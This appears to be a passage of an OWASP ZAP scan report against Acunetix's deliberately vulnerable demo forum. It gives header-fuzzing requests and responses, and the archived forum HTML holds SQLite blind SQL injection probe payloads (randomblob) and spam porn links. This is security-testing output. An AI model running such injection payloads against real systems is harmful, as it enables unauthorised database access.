3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>11111111111111111111111111111111111111111111</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>99999999999999999999999999999999999999999999</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | msnbot/1.1 (+http://search.msn.com/msnbot.htm) |
| Evidence | |
| Request Header - size: 324 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:18 GMT Content-Length: 7002 |
| Response Body - size: 7,002 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(10000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>vff6rlo7y9bn4nnpamaw853v9htle2v0zgp8a9prshvwt6b212nzabhqqu</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>96fduxacxooggw29oks1sj31qik8jry084qbqhychmtl2dt25shmaiaw7oq1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>19595700666655765840479055397029421057109081</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>00000000000000000000000000000000000000000000</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>11111111111111111111111111111111111111111111</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>99999999999999999999999999999999999999999999</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| Evidence | |
| Request Header - size: 413 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:45 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) |
| Evidence | |
| Request Header - size: 413 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:43 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) |
| Evidence | |
| Request Header - size: 413 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:43 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
| Evidence | |
| Request Header - size: 435 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:45 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) |
| Evidence | |
| Request Header - size: 446 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:46 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 |
| Evidence | |
